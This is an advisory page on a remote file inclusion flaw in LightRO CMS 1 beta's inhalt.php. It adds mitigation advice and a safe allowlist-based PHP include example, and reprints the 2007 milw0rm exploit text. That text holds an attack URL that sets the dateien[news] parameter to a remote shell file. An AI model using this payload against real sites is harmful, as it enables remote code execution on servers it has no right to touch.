Vendor: LightRO CMS
By: ajann
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: LightRO CMS
Affected Version From: 1 beta
Affected Version To: 1 beta
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LightRO CMS 1 beta (inhalt.php) Remote File Include Vulnerability

LightRO CMS 1 beta is vulnerable to remote file inclusion in inhalt.php. The script passes $dateien['news'] to include, and that value can be supplied through the dateien[news] request parameter, so an attacker can make the script include a remote file, leading to potential code execution or sensitive information disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates from the vendor. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
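
One way to implement the input validation recommended above, as an added example (not LightRO's code and not part of the original advisory): the include target is chosen from a map defined in code, so a request can supply only a page key, never a path or URL. The `pages` directory, the file names and the `seite` parameter are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed layout: includable fragments live in ./pages beside this script.
const PAGE_DIR = __DIR__ . '/pages';

// The map is defined in code and is never populated from the request,
// unlike $dateien in the vulnerable script.
const DATEIEN = [
    'news' => 'news.php',   // hypothetical file names
    'home' => 'home.php',
];

/**
 * Return the absolute path for a known page key, or null if the key is
 * unknown or the resolved file lies outside PAGE_DIR.
 */
function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, DATEIEN)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . DATEIEN[$key]);
    if ($base === false || $path === false) {
        return null;        // missing directory or file
    }
    // realpath() has resolved symlinks and "..", so a prefix check is sound.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Defence in depth: refuse to run if PHP would fetch URLs in include().
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}

// 'seite' is a hypothetical request parameter carrying only a page key.
$key  = is_string($_GET['seite'] ?? null) ? $_GET['seite'] : 'news';
$file = resolve_page($key);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Because the request value is used only as an array key, a URL or traversal string passed in `seite` matches no entry and the script answers 404 without touching `include`.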

Exploit-DB raw data:

*******************************************************************************
# Title   :  LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.lightro.de.tc/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $dateien['news'];
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-02-06]